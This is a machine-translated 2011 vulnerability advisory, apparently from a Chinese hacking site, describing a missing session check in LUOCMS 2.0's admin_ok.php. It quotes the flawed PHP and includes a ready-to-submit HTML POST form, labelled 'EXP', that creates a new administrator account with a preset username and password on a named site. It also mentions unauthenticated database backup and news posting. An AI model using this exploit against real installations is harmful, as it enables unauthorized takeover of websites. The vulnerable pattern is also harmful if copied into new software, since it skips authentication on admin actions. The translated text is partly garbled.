luocms 2.0 add administrator vulnerability...attached to the POST EXP-vulnerability warning-the black bar safety net

2011-01-12T00:00:00
ID MYHACK58:62201128835
Type myhack58
Reporter 佚名
Modified 2011-01-12T00:00:00

Description

LUOCMS is a paragraph based on PHP+MYSQL article management system, easy-to-use, full DIV+CSS architecture, the whole Station HTML, good internal structure, more suitable for website optimization promotion.

This author's idea is that the user can directly see the files on the session authentication does not show something of it without processing. Again look at the code admin\manager\admin_ok.php

<? php require_once '../../inc/const.php'; //connect to the database //Here than other files fewer validation session(username)exists...... $act = trim($_GET['act']); //not resolved $id = getvar('id'); // getvar Definition is the addslashes filter this stuff //Add data if ($act=='add') { if(check_username($_POST['username'])){ exit("<script>alert('user ".$ _POST['username']." Already exists!'); window. history. go(-1)</script>"); //verify that the same administrator name }

$record = array( 'username' =>$_POST ['username'], 'password' =>md5($_POST ['password']), 'addtime' =>date ( "Y-m-d H:i:s" ), 'supermanager' =>$_SESSION['supermanager'] + 1 ); //Does not parse the supermanager no it doesn't matter $id = $db->insert($GLOBALS[databasePrefix].'manager',$record); //write directly to the database. echo "<script>alert('added successfully!'); window. location='admin_manage.php';</script>"; } // The following code is omitted is the modification and deletion of

Attached to the POST EXP

<form method="post" action="http://www.hackqing.com/admin/manager/admin_ok.php?act=add" enctype="multipart/form-data" id="upload"> <label> <input name="username" type="text" value="Beijing" /> </label> <label> <input name="password" type="text" value="qing520" /> </label> <div></div> <input name="respondids" value="OK to modify" class="coolbg np" type="submit"> </form>

Not only here to backup the database is to add the news is anyway invisible to the user are not required to verify it.

Program download address: Local download: http://www.luocms.com/down/luocms_V1.100606_UTF8.rar chinaz webmaster Station download: http://down.chinaz.com/soft/26349.htm A5 stationmaster Station download: http://down.admin5.com/code_php/24114.html

Author: mind